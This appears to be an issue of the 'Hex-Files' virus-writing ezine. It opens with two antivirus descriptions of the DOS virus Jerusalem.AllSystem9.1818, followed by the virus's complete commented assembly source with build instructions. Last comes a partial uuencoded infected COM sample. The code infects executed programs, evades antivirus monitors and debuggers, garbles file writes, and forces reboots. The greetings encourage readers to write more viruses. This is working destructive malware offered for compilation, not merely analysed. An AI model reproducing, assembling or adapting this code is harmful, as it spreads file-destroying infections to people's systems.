Copy Link
Add to Bookmark
Report

Hexfiles Issue 4 File 004

eZine's profile picture
Published in 
hexfiles
 · 4 months ago

  
HEX-FILES No. 4 File 004
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Jerusalem.AllSystem9.1818

a disassembly by

YeZ
yez@rocketmail.com



Name : Jerusalem.AllSystem9.1818
Author : unknown
Origin : Metro Manila (?)


We would be having two descriptions of the virus. The first comes
from the documentation of CURE143, a Jerusalem.AllSystem9.1818
antivirus program by Alex Jonathan N. Ibrado, a B.S. Applied Physics
student in University of the Philippines, Diliman:

The virus contains the text:

All System 9 - (c) 1991, Jerry C.

and prints out the following message after 15 unsuccessful
attempts to infect a file:

Parity error at address 14344
Abort, Retry, Ignore ?

The author of this virus, most probably a Filipino, has quite a
grim sense of humor, as you can see from the message.

The virus causes system hangs (especially on AT systems). Even
worse, after 35 writes to the disk, writes garbage to the file.
Technically, the virus reverses the DS and DX registers before
writing.

The 14344 virus encorporates some stealth techniques which enable
it to fool resident anti-virus software which guard against the
modification of executable files.

The virus increases the size of EXE files by around 2074 bytes
(+ < 16 for paragraph alignment), and COM files by 1893 bytes. COM
files will not be reinfected, but EXE files may have multiple
infections. After several infections, the file may refuse to
execute.

The virus redirects INT 01h, INT 03h, and INT 21h functions 4Bh
(load and exec), 40h (write to file), 15h (sequential write using
FCBs), 22h (random file write with FCBs), and 28h (random block
write with FCBs). The virus will try to infect any program you
execute. A file written to may be corrupted, as mentioned earlier.
It also fiddles around with the DTA during FCB-style writes. COM
files are also subjected to partial elementary encryption,
presumably to make removing the virus more difficult.


This description is the entry of Jerusalem.AllSystem9.1818 in phil_av
virus info (http://members.xoom.com/phil_av/encyc.htm#AllSys9) which
would give you another view of the virus:

It installs as a 2576-byte TSR. It redirects Int 01h, 03h and 12h.
It redirects Int 01h and 03h to prevent the virus code from being
traced. It does not restore these two interrupts nor does it set a
proper handler.

It infects COM and EXE programs when executed. It considers a
program as COM if the file extension ends with M. All others are
treated as EXEs, as well as files over 64 Kb. Length of infected
EXE files increases by 2074 - 2089 bytes (2074 + 0-15 byte
alignment). Length of COM files increases by 1818 - 2073 bytes
(1818 + 0-255 bytes). The virus is located at the end of EXEs and
at the beginning of COM files. It encrypts the first 1-15 bytes of
the host COM program. It uses the value of the encrypted first
byte is used to randomize the length of the infected file. It
reinfects EXEs because it does not check for infection. It uses
the first 16 bytes of the virus code to check COM files for
infection.

It maintains a counter of the number of times a disk write is
invoked since becoming memory resident. If the value of the
counter is at least 35 when a write using file handles is invoked,
it swaps the value of the DS and DX registers destroying the file
being written to. If the value of the counter is at least 150 when
an FCB write is invoked, the first 100 bytes of the data being
written to disk are checked for tab, line feed and space
characters. These are replaced with the characters for backspace,
form feed and carriage return, respectively.

After execution of 15 programs, it displays a message and then
reboots the system when a key is pressed.

ÄÄ JALLSYS9.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS CONTAINS DESTRUCTIVE CODES ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS DOES INTENTIONAL DAMAGE ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±± ±
;±±±±± Virus Name: Jerusalem.AllSystem9.1818 ±±±±±±±±±±±± HEX-FILES No. 4 ±
;±±±±± Origin : Metro Manila, Philippines ±±±±±±±±±±±± ±
;±±±±± Author : ????? ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±± ±±
;±±±±± COMPILING ±±±±±±±±±±±± TASM /m2 hf4list2; ±±
;±±±±± INSTRUCTION ±±±±±±±±±±±± TLINK /t hf4list2; ±±
;±±±±± ±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± Using other compilers might produce a ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± a new variant. ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±
;±±±±± Program listing created by YeZ <yez@rocketmail.com> ±±±±±±±±±±±±±±±±
;±±±±± ±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±± Greetz: ±±
;±± ±±
;±±± Peace and be Wild to all Vx programmers around the globe... ±±
;±±± To all my fellow B.S.P.T. Students: Keep Studying your Anatomy!! :) ±±
;±±± PhVx: We wanna see more viruses from all of you filipino Vx coders. ±±
;±±± And of coz YOU! ±±
;±±± ±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± === ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± YeZ ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± === ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
.model tiny
.code

org 100h

start_as9:
push cs
pop ds
mov si,offset as9_entry
pushf
push cs
mov ax,3503h ;Get INT 3 (debug breakpoint!)
int 21h
mov [i3off],bx
mov [i3seg],es
dec al
dec al ;Get INT 1 (debug Step by Step INT!)
int 21h
mov [i1off],bx
mov [i1seg],es
mov dx,offset start_as9
push si
mov ax,2503h ;Hook INT 3 (Cute Anti-debugging technique)
int 21h
mov dx,offset start_as9
mov ax,2501h ;Hook INT 1 (Wow debug will really be dead)
int 21h
push cs
pop es
iret ;goto the virus real entry (as9_entry)

db 0dah ;I don't have any idea what is this for?

;------------------
;EXE vital datas!!!
;------------------
stack_seg dw 0 ;SS of the host EXE
stack_off dw 0 ;SP of the host EXE
exe_ret label dword
exe_ip dw 0 ;IP of the host EXE
exe_cs dw 0 ;CS of the host EXE

file_type db 0 ;file type (0=COM, 1=EXE) :)

exe_start_as9:
mov ax,es
add ax,10h ;PSP + 10h = AX
add word ptr cs:[stack_seg-100h],ax ;Set EXE SS segment
add word ptr cs:[exe_cs-100h],ax ;Set EXE CS segment
mov ax,cs
sub ax,10h
push ax
mov ax,offset start_as9 ;Go back to start
push ax
retf ;Jump now!

;==========
;Real Entry
;==========
as9_entry: ;This is the initial point of the virus.
mov ah,0e1h ;Check if virus is resident?
int 21h
cmp ah,0beh ;Yep the virus is present.
je already_infected
jmp infect_system ;Nop "Infect it then"

already_infected:
cmp [file_type],0 ;Is it a COM file?
je com_ret
mov ss,[stack_seg] ;EXE file adjust.
mov sp,[stack_off]
mov ah,51h ;Get PSP Address.
int 21h
push bx
push bx
pop ds
pop es
jmp cs:[exe_ret] ;Jump to EXE host program now.

com_ret:
inc ah ;COM file adjust.
int 21h ;^ its code is part of the Virus's INT 21

;-----
;INT 3
;-----
i3off dw 0
i3seg dw 0

;-----
;INT 1
;-----
i1off dw 0
i1seg dw 0

;------
;INT 21
;------
i21 label dword
i21off dw 0
i21seg dw 0

;------
;INT 24
;------
i24off dw 0
i24seg dw 0

;-----------
;Virus Datas
;-----------
com_ret_size dw 3 ; Size of COM to return to entry point
host_size dw 3 ; Size of the host file
dw 0
dw 0
file_attr dw 0 ; Host file attribute
file_handle dw 0 ; Host file handle
file_seg dw 0 ; Host filename segment
file_off dw 0 ; Host filename offset
sys_sp dw 0 ; System's SP
sys_ss dw 0 ; System's SS
file_buf dw 0

; host name buffer should be 56 bytes long

host_name db 'C:\DISASM\BY\YEZ.COM',36h dup (0)

db 'All System 9 - (c) 1991, Jerry C.$'

bogus_msg db 10,13,7
db 'Parity error at address 14344',10,13
db 'Abort, Retry, Ignore ? $'

;*****************
;INT 24H PROCEDURE
;*****************
i24_proc:
xor al,al
stc
iret

;=================
;Terminate Payload
;=================
Terminate_payload:
push cs
pop ds
mov dx,offset i9_proc
mov ax,2509h
pushf
call cs:[i21]
mov ax,2
int 10h
mov ah,9 ;Display the bogus error message isn't this
mov dx,offset bogus_msg ;cute...
pushf
call cs:[i21]
xor ah,ah ;This is to get keystroke from user :)
int 16h

i9_proc:
mov ax,0ffffh
push ax
pop ds ;the intention here is to clear the reset flag
mov bx,482h ; at 0:472. what do you think? remember that
mov word ptr [bx],0 ; this virus appeared when 286's were king.
db 0eah ; |
dw 0 ; |- JMP FAR FFFF:0000 (This will reboot the system).
dw 0ffffh ; |


;****************
;INT 21 PROCEDURE
;****************
int21_proc:
pushf
cmp ah,0e1h ;Memory self recognition ID
jne com_ret_proc
mov ah,0beh ;Yes im here sign!
popf
iret

com_ret_proc:
cmp ah,0bfh ;COM Return to host?
jne i21_func

mov cx,[host_size] ;Get host size.
mov cs:[com_ret_size],cx ;Set our COM return size to host size. :)
mov di,100h ;COM entry point.
mov si,vir_size ;Host program Original entry point.
cld ;"DO I NEED TO TELL YOU WHAT THIS IS?"
rep movsb ;"AND THIS TOO?" :)
push ax ;Save our registers
push bx
push cx
push dx
push di
mov di,100h ;100h now holds our original COM program.
mov bx,15
xor dx,dx
mov ax,cs:[com_ret_size] ;Calculating decrypt count.
div bx ;by (com_ret_size/15) = decrypt repeatition
mov cx,dx
or cx,cx ;Is the quotient 0?
jnz decrypt1
mov cx,15 ;Yes then we use 15
decrypt1:
not byte ptr [di] ;Decrypting...
inc di
loop decrypt1
pop di ;Pop all our saved registers
pop dx
pop cx
pop bx
pop ax
popf
pop ax ;Pop the INT SAVED IP register
mov ax,100h ;Load the 100h (COM ENTRY) in AX
push ax ;now our IP will be 100h (IP:100H)
iret ;Interrupt return will be CS:100h ok!

i21_func:
cmp ax,4b00h ;Exec function?
je infect_file ;Yes then infect file
cmp ah,40h ;Is it a write function?
jne chk_more_21 ;nope then continue scanning the function.
jmp write_inc_handle

chk_more_21:
cmp ah,15h
je primitive_write
cmp ah,22h
je primitive_write
cmp ah,28h
jne jmp_int21

primitive_write: ;15h,22h,28h/21h all goes here :)
inc cs:[count1]
cmp cs:[count1],96h ;have we reached the limit?
nop ;nop is hardcoded because of tasm /m2
jb jmp_int21 ;Nope "masuwerte ka!" :)

;===========================
;15h,22h,28h/21h payload !!!
;===========================
push ax ;Push our registers
push bx
push cx
push dx
push di
push si
push es
push ds
mov cx,64h ;load manipulation length = 100 bytes
mov ah,2fh ;Get DTA address
int 21h
push es
pop ds
push bx
pop di ;ES:BX = DS:DI
loop_chg_payload: ;This payload will change some characters
mov al,[di] ;on your DTA isn't this fun...
cmp al,20h
jne try_9 ;replace space with carriage return
mov byte ptr [di],0dh
jmp inc_chg_loop
try_9:
cmp al,9 ;replace tab with backspace
jne try_a
mov byte ptr [di],8
try_a:
cmp al,0ah ;replace line feed with form feed
jne inc_chg_loop
mov byte ptr [di],0ch
inc_chg_loop:
inc di
loop loop_chg_payload
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax ;Pop all our save registers.

jmp_int21: ;Jump to real INT 21
popf
jmp cs:[i21]

;====================
;Infection routine!!!
;====================
infect_file:
push ax ;As usual push all registers
push bx
push cx
push dx
push es
push ds
push di
push si
mov cs:[file_seg],ds ;Save filename DS in our virus
push cs
pop ds
mov [file_off],dx ;And of coz the DX too.
mov dx,cs
mov [sys_ss],ss ;We should also save the current SS
mov [sys_sp],sp ;and SP of our system.
cli
mov ss,dx ;use our own SS and SP
mov sp,offset com_entry_point+100h
sti
push ds
push dx
push es
push bx
mov ax,3524h ;Get INT 24 ...
int 21h
push cs
pop ds
mov [i24off],bx ;...and save
mov [i24seg],es
mov dx,offset i24_proc ;Set up our own error handler
mov ax,2524h
int 21h
pop bx
pop es
pop dx
pop ds
mov ds,cs:[file_seg] ;Load the save filename segment:offset
mov dx,cs:[file_off] ;to DS:DX.
mov si,dx
push es
push di
push cs
pop es
mov di,offset host_name
cld
load_hostname: ;Save filename as our hostname.
cmp byte ptr [si],0
je hostname_loaded
cmp byte ptr [si],'z'
ja store_char
cmp byte ptr [si],'a'
jb store_char
sub byte ptr [si],' '
store_char:
mov al,[si]
stosb
inc si
jmp load_hostname

hostname_loaded:
mov byte ptr es:[di],0 ;Mark end of entry with 0
mov al,es:[di-1]
add byte ptr [si-1],96h ;zap last char of extension
push si
pop cs:[file_buf]
dec word ptr cs:[file_buf]
pop di
pop es
push ax
push dx
push ds
push ds
pop es
push dx
pop di
push cs
pop ds
mov dx,offset host_name
mov ah,56h ;rename file to non-executable filename
int 21h ;hides infection from tsr avs
pop ds
pop dx
pop ax
jc on_error21
cmp al,'M'
je mark_com
mov byte ptr cs:[file_type],1 ;Mark EXE file.
jmp real_infection
mark_com:
mov byte ptr cs:[file_type],0 ;Mark COM file.
jmp real_infection

on_error21: ;On error, clean up then return to program
push cs:[i24seg]
pop ds
mov dx,[i24off]
mov ax,2524h ;Return INT 24.
int 21h
push cs:[file_seg]
pop ds
push cs:[file_off]
pop dx
push cs
pop es
mov di,offset host_name
mov ah,56h ;Restore host's real filename.
int 21h
mov di,cs:[file_buf]
sub byte ptr [di],96h
push cs
pop ds
cli
mov ss,[sys_ss] ;Return System's SS
mov sp,[sys_sp] ;and SP.
sti
inc byte ptr cs:[count2] ;Increment our counter.
cmp byte ptr cs:[count2],15 ;Have we reached the limit?
jnz out_i21 ;Nope then Return to real INT 21.
jmp Terminate_payload ;YYYeeeZZZ then do our PAYLOAD!

out_i21:
pop si ;Pop all saved registers.
pop di
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
popf
jmp cs:[i21] ;Jump to original INT 21.

real_infection:
mov ax,4300h ;Get file attribute.
int 21h
jc on_error21
mov cs:[file_attr],cx ;save current file attribute.
mov ax,4301h ;Set attribute.
xor cx,cx ;Disable all attributes.
int 21h
jc on_error21
mov ax,3d02h ;Open file R/W
int 21h
jc on_error21
mov cs:[file_handle],ax ;Save the file handle
mov bx,ax
mov ax,4202h ;Get file length
xor cx,cx
xor dx,dx
int 21h
cmp byte ptr cs:[file_type],01 ;is it an EXE?
je file_ok
or dx,dx ;Is it larger than 64k something?
jz file_ok ;Nope (No COM program exceeds 64k)

close_exit:
mov ah,3eh ;Close host file
mov bx,cs:[file_handle]
int 21h
push cs
pop ds
mov cx,[file_attr] ;Return Original attribute
mov ax,4301h
mov dx,[file_off]
mov ds,[file_seg]
int 21h
jmp on_error21

file_ok:
push ds
push cs
pop ds
mov [host_size],ax ;Save the size of the file.
mov es,[file_seg]
mov di,[file_off]
pop ds
mov cx,16
xor dx,dx
cld
mov al,':'
repne scasb
jne not_3a
mov dl,es:[di-2]
sub dl,'A'-1
not_3a:
mov ah,36h ;Get disk free space
int 21h
cmp ax,0ffffh ;Error!
je close_exit
cmp bx,3 ;Is it sufficient
jnb diskspace_ok ;YeZ continue
jmp close_exit ;Nope sorry insufficient disk space!!!
diskspace_ok:
mov ah,48h
mov bx,1000h ;allocate 1000h of paragraphs.
int 21h
jc close_exit
mov cs:[mem_blk],ax ;save mem block in our code
mov ax,5700h ;Get host date/time
mov bx,cs:[file_handle]
int 21h
push cs
pop ds
mov al,[count1] ;load al,count1
mov ah,[count2] ;load ah,count2
mov byte ptr [count2],0 ;initialize count2 to 0
nop ;nop is hardcoded because of tasm /m2
mov byte ptr [count1],0 ;initialize count1 to 0
nop ;nop is hardcoded because of tasm /m2
mov [date],dx ;Save file date
mov [time],cx ;Save file time
mov es,[mem_blk] ;Load ES with our mem block
mov si,offset start_as9 ;move virus from ds:100h to
xor di,di ;es:0
mov cx,vir_size
sub cx,offset start_as9
cld
rep movsb
mov [count1],al ;return current count1
mov [count2],ah ;return current count2
mov bx,[file_handle]
mov ax,4200h ;Move pointer to the beginning of the file.
xor cx,cx
xor dx,dx
int 21h
cmp byte ptr cs:[file_type],0 ;Is it a COM
jne exe_infection_routine
jmp com_infection_routine

exe_infection_routine: ;EXE infection routine
push ds
mov cx,1ch
push es
pop ds
mov dx,di
mov ah,3fh ;Read EXE header
int 21h
pop ds
jc really_err
push ds
push es
pop ds
push [di+0eh] ;CS Of
push [di+10h] ;IP the
push [di+16h] ;SS EXE
push [di+14h] ;SP program

pop cs:[exe_ip] ;SAVE IT ALL
pop cs:[exe_cs]
pop cs:[stack_off]
pop cs:[stack_seg]
pop ds
mov ax,4200h ;move pointer to beginning of file.
mov bx,cs:[file_handle]
xor cx,cx
xor dx,dx
int 21h
really_err:
jnc no_err_just_kidding
jmp freemem_exit

no_err_just_kidding:
mov ax,es:[di+4] ;AX now has program size in 512 byte pages
cmp word ptr es:[di+2],0
je di2_0
dec ax
di2_0:
mov bx,200h ;Convert 512 byte page in AX to bytes size.
mul bx
add ax,es:[di+2] ;add with the length of image.
adc dx,0 ;add on carry
add ax,15 ;give allowance to the length of image
adc dx,0 ;add on carry
and ax,0fff0h ;clear lower 4 bits
push ax
push dx
mov word ptr es:[di+20],40h ;Put this 40h to the EXE's IP

mov bx,10h ;divide DX:AX / BX (effectively converting
div bx ; DX:AX to paragraph form).
sub ax,es:[di+8] ;subtract the header size (in paragraph)
mov es:[di+14],ax ;Convert EXE's SS
mov es:[di+22],ax ;Convert EXE's CS
mov word ptr es:[di+16],0ffffh ;This will be our SP :)
pop dx
pop ax
push ax
push dx
add ax,vir_size ;Add our virus size with EXE image size
adc dx,0 ;Add on carry
mov bx,200h ;Divide DX:AX by BX (will convert our DX:AX to
div bx ; 512 bytes pages).
mov es:[di+2],dx ;Update our EXE's image length.
or dx,dx ;Is it 0?
jz inc_ax_dx_0
inc ax ;increment if DX<>0.
inc_ax_dx_0:
mov es:[di+4],ax ;Update or file size in 512 bytes pages.
mov ah,40h ;Write our NEW INFECTED EXE HEADER!!!
mov bx,[file_handle]
mov cx,28
push di
pop dx
push ds
push es
pop ds
pushf
call cs:[i21]
pop ds
pop dx
pop ax
mov cx,4200h ;move file pointer to the end of file.
xchg cx,dx
xchg dx,ax
int 21h
jc unable_exe_body_write
mov ah,40h ;Write the virus body!
mov dx,offset start_as9
mov cx,vir_size ;This is suppose to be the size of virus
pushf
call cs:[i21]
unable_exe_body_write:
jmp ret_dt

com_infection_routine:
mov cx,cs:[host_size] ;Load CX=file size
mov dx,di
push es
pop ds
mov ah,3fh ;Read entire COM file
int 21h
jc freemem_exit
push di
xor si,si
mov cx,16
cld
repe cmpsb ;compare if the file is already infected?
pop di
jcxz freemem_exit
push ax ;Infect COM file
push bx
push cx
push dx
push di
mov bx,15
xor dx,dx
mov ax,cs:[host_size] ;Getting encrypt repeation
div bx
mov cx,dx
or cx,cx
jnz encrypt_entry
mov cx,15
encrypt_entry:
not byte ptr [di]
inc di
loop encrypt_entry
pop di
pop dx
pop cx
pop bx
pop ax
mov bx,cs:[file_handle]
mov ax,4200h ;Move file pointer to the beginning.
xor cx,cx
xor dx,dx
int 21h
mov cx,cs:[host_size]
add cx,vir_size ;Add with the virus size.
add cl,[di]
adc ch,0
sub cx,100h ;Adjust with the org 100h
mov ah,40h ;write it ... infect it ... rape it ...
mov bx,cs:[file_handle] ; or what ever you may call it!
xor dx,dx
pushf
call cs:[i21]
jc freemem_exit ;error...
ret_dt:
mov ax,5701h ;return the host's date/time :)
mov cx,cs:[time]
mov dx,cs:[date]
int 21h
freemem_exit:
mov ah,49h
int 21h
jmp close_exit

;====================
;Check 40/21h routine
;====================
write_inc_handle: ;Write routine 40h/21h
cmp bx,4
jb jmp_i21_b
inc byte ptr cs:[count1]
cmp byte ptr cs:[count1],35 ;Have we reached the limit?
jnb do_trash_write_handle
jmp_i21_b:
popf
jmp cs:[i21]

count1 db 0 ;buffer for file handle
count2 db 0 ;fcb write counter

;==================
;40h/21h Payload!!!
;==================
do_trash_write_handle:
jcxz jmp_i21_b
cmp bx,4
jb jmp_i21_b
push ds ;When the limit is reached, the virus will intercept
push dx ;every 40h/21h calls, effectively trashing all
mov ax,ds ;things you write via that call. Or in other words
xchg dx,ax ;YOU'LL BE WRITING GARBAGE instead of what you've
mov ds,ax ;intended to write!!!
mov ah,40h
call cs:[i21]
pop dx
pop ds
iret

;----------------
;Virus Host Datas
;----------------
time dw 0
date dw 0
mem_blk dw 0

;parameter block
env_blk dw 0
var1 dw 0
var2 dw 0
var3 dw 0
var4 dw 0
var5 dw 0
var6 dw 0

env_buffer:
db 37 dup(0)

infect_system:
cmp cs:[file_type],0 ;Check if it is a COM program?
je set_i21 ;YeZ Set up immediately
mov ah,51h ;Get PSP address
int 21h
mov es,bx
push cs
pop ds
mov si,offset start_as9 ;Start of the virus
mov di,si
mov cx,vir_size ;virus size
cld
rep movsb
push es
pop ds
push es
mov ax,offset set_i21
push ax
retf

dw 0 ;wwoohhh!!

set_i21:
mov ax,3521h ;Get our INT 21
int 21h
mov [i21off],bx ;Save it
mov [i21seg],es
mov dx,offset int21_proc ;load our INT 21 Procedure
mov ax,2521h ;Set INT 21
int 21h
mov ax,word ptr ds:[2ch] ;Get environment segment
mov [env_blk ],ax ;save environment segment
or ax,ax ;If AX:0 then the program has no
jnz env_n0 ;environment block.

mov ah,51h ;Get PSP
int 21h
mov es,bx
mov ds,bx
mov bx,1000h
mov ah,4ah ;Resize program's memory allocation to
int 21h ;1000h paragraph or 1 whole segment.
mov ah,48h ;Try to allocate all your system R.A.M.
mov bx,0ffffh ;"HOY! HARAGAN!!!" :)
int 21h
mov ah,48h ;It is impossible to allocate that much R.A.M
int 21h ;so allocate all remaining R.A.M. Yay!!!
mov dx,ax ;segment in which to set up new PSP
mov es,ax
mov ah,55h ;create PSP
int 21h
push es
mov ah,52h ;Get disk list
mov bx,es
int 21h
pop es
mov di,offset start_as9
mov si,di
mov cx,7fffh
cld
rep movsw ;Move our code to the Newly set-up PSP
push es
push es
pop ds
mov ax,offset as9_entry ;goto to as9_entry on our new PSP :)
push ax
retf

env_n0: ;Setting our environment...
push cs
pop es
push es
mov [var2],es
mov [var4],es
mov [var6],es
mov word ptr [var3],offset env_buffer
mov word ptr [var5],offset env_buffer
mov ax,2901h ;Parse file name ?
push ax
mov si,81h
push si
mov di,[var3]
int 21h
mov di,[var5]
pop [var1]
pop ax
int 21h
mov ah,4ah ;Resize our allocted R.A.M.
pop es ;by 91ah paragraphs
push es
mov bx,offset com_entry_point+100h
push bx
mov cl,4
shr bx,cl
inc bx
pop cx
pop dx
cli
mov ss,dx ;Adjust our SS
mov sp,cx ;and SP
sti
int 21h
push [env_blk]
pop es
mov ah,49h ;Free our environment block segment
int 21h
mov cx,7fffh
xor di,di
xor al,al
loop1:
repne scasb
cmp es:[di],al
loopne loop1

mov dx,di
add dx,3 ;load filename to execute
mov bx,offset env_blk ;load the parameter
push es
pop ds
push cs
pop es
mov cs:[sys_ss],ss ;save our SS
mov cs:[sys_sp],sp ;and SP as well...
mov ax,4b00h ;Execute now!!! This will execute the host
pushf ;file.
call cs:[i21]
mov ss,cs:[sys_ss] ;return SS
mov sp,cs:[sys_sp] ;and SP
mov ah,4dh ;get return code.
int 21h
mov ah,31h ;go resident.
mov dx,offset com_entry_point+100h
mov cl,4
shr dx,cl ;convert to size to paragraph form
add dx,10h ;add PSP
int 21h ;Viola!!!!! your system is now infected !!!

;THAT'S ALL FOLKS

com_entry_point:

vir_size equ offset com_entry_point

; This is where the virus saves the COM file entry...

db 06Fh,032h,0DFh ; This is encrypted (NOT encryption) :)

end start_as9

ÄÄ JALLSYS9.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

The infected file below was infected by a virus created when the source code
listed above was compiled in TASM 2.01.


ÄÄ JALLSYS9.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

begin 644 jallsys9.com
M#A^^6@&<#K@#-<TAB1Z&`8P&B`'^R/[(S2&)'HH!C`:,`;H``5:X`R7-(;H`
M`;@!)<TA#@?/V@```````````(S`!1``+@$&-P`N`08]`(S(+1``4+@``5#+
MM.'-(8#\OG0#Z98%@#X_`0!T%8X6-P&+)CD!M%'-(5-3'P<N_RX[`?[$S2$`
M`:8B``&F(H\"!Q!5`2@.``'=`0`````@``4`*`XU!?(%*`Y#!4$Z7$I!3$Q3
M65,Y+D-/30``````````````````````````````````````````````````
M````````````````````````````````````06QL(%-Y<W1E;2`Y("
T@*&,I
M(#$Y.3$L($IE<G)Y($,N)`H-!U!A<FET>2!E<G)O<B!A="!A9&1R97-S(#$T
M,S0T"
@U!8F]R="P@4F5T<GDL($EG;F]R92`_("0RP/G/#A^Z?@*X"26<+O\>
MC@&X`@#-$+0)NAX"
G"[_'HX!,N3-%KC__U`?NX($QP<``.H``/__G(#\X74$
MM+Z=SX#\OW4_BPZ8`2Z)#I8!OP`!OAH(_/.D4%-14E>_``&[#P`STBZAE@'W
M\XO*"
\EU`[D/`/851^+[7UI96UB=6+@``5#//0!+=&*`_$!U`^FG`X#\%70*
M@/PB=`6`_"AU12[^!JD&+H`^J0:6D'(W4%-14E=6!AZY9`"T+\TA!A]37XH%
M/"!U!<8%#>L./`EU`\8%"#P*=0/&!0Q'XN0?!U]>6EE;6)TN_RZ.`5!345(&
M'E=6+HP>H@$.'XD6I`&,RHP6J`&))J8!^H[2O!H)^QY2!E.X)#7-(0X?B1Z2
M`8P&E`&Z6`*X)"7-(5L'6A\NCAZB`2Z+%J0!B_(&5PX'OZP!_(`\`'03@#QZ
M=PB`/&%R`X`L((H$JD;KZ"
;&!0`FBD7_@$3_EE8NCP:J`2[_#JH!7P=04AX>
M!U)?#A^ZK`&T5LTA'UI8<A0\370(+L8&/P$!ZUXNQ@8_`0#K5B[_-I0!'XL6
MD@&X)"7-(2[_-J(!'R[_-J0!6@X'OZP!M%;-(2Z+/JH!@"V6#A_ZCA:H`8LF
MI@'[+OX&J@8N@#ZJ!@]U`^D?_EY?'P=:65M8G2[_+HX!N`!#S2%RHRZ)#IX!
MN`%#,\G-(7*5N`(]S2%RCBZCH`&+V+@"0C/),]+-(2Z`/C\!`70C"])T'[0^
M+HL>H`'-(0X?BPZ>`;@!0XL6I`&.'J(!S2'I5/\>#A^CF`&.!J(!BSZD`1^Y
M$``STORP.O*N=0<FBE7^@.I`M#;-(3W__W2V@_L#<P+KK[1(NP`0S2%RIBZC
MQP:X`%<NBQZ@`<TA#A^@J0:*)JH&Q@:J!@"0Q@:I!@"0B1;%!HD.PP:.!L<&
MO@`!,_^Y&@B!Z0`!_/.DHJD&B":J!HL>H`&X`$(SR3/2S2$N@#X_`0!U`^G3
M`!ZY'``&'XO7M#_-(1]R,AX&'_]U#O]U$/]U%O]U%"
Z/!CL!+H\&/0$NCP8Y
M`2Z/!C<!'[@`0BZ+'J`!,\DSTLTA<P/I"P$FBT4$)H-]`@!T`4B[``+WXR8#
M10*#T@`%#P"
#T@`E\/]04B;'111``+L0`/?S)BM%"":)10XFB446)L=%$/__
M6EA04@4:"(/2`+L``O?S)HE5`@O2=`%`)HE%!+1`BQZ@`;D<`%=:'@8?G"[_
M'HX!'UI8N0!"A\J2S2%R#K1`N@`!N1H(G"[_'HX!ZV\NBPZ8`8O7!A^T/\TA
M<F]7,_:Y$`#\\Z9?XV-04U%25[L/`#/2+J&8`??SB\H+R74#N0\`]A5'XOM?
M6EE;6"Z+'J`!N`!",\DSTLTA+HL.F`&!P1H(`@V`U0"!Z0`!M$`NBQZ@`3/2
MG"
[_'HX!<@^X`5<NBP[#!BZ+%L4&S2&T2<TAZ?']@_L$<@TN_@:I!BZ`/JD&
M(W,(G2[_+HX!``#C]H/[!'+Q'E*,V)*.V+1`+O\>C@%:'\\R!C8E2Q%@#X$`
MJ1#7!JD0UP:I$``@("`@("`@("`@(```````````````````````````````
M```N@#X_`0!T';11S2&.PPX?O@`!B_ZY&@C\\Z0&'P:X(0=0RP"
X(37-(8D>
MC@&,!I`!NH\``K@A)<TAH2P`H\D&"\!U/;11S2&.PX[;NP`0M$K-(;1(N___
MS2&T2,TAB]"
